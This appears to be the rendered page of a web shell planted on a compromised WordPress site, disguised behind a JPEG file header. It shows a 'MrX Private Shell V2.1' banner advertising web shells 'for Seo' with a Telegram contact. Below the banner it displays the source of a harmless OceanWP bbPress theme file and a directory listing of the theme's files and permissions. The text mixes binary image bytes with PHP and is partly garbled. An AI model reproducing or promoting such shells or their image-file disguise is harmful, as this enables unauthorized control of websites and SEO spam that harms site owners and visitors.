����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* bbPress class
*
* @package OceanWP WordPress theme
*/
// If bbPress plugins doesn't exist then return.
if ( ! class_exists( 'bbPress' ) ) {
return;
}
if ( ! class_exists( 'OceanWP_bbPress' ) ) :
class OceanWP_bbPress {
/**
* Setup class.
*
* @since 1.4.0
*/
public function __construct() {
add_action( 'wp_enqueue_scripts', array( $this, 'add_custom_css' ) );
}
/**
* Load custom CSS file
*
* @since 1.4.3
*/
public static function add_custom_css() {
wp_enqueue_style( 'oceanwp-bbpress', OCEANWP_CSS_DIR_URI .'third/bbpress.min.css' );
}
}
endif;
return new OceanWP_bbPress();| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| class-amp.php | File | 13.76 KB | 0644 |
|
| class-bbpress.php | File | 645 B | 0644 |
|
| class-beaver-themer.php | File | 5.26 KB | 0644 |
|
| class-buddypress.php | File | 669 B | 0644 |
|
| class-elementor.php | File | 10 KB | 0644 |
|
| class-gutenberg.php | File | 8.87 KB | 0644 |
|
| class-learndash.php | File | 9.63 KB | 0644 |
|
| class-lifterlms.php | File | 16.94 KB | 0644 |
|
| class-pwa.php | File | 1.57 KB | 0644 |
|
| class-sensei.php | File | 5.41 KB | 0644 |
|
| class-social-login.php | File | 1.88 KB | 0644 |
|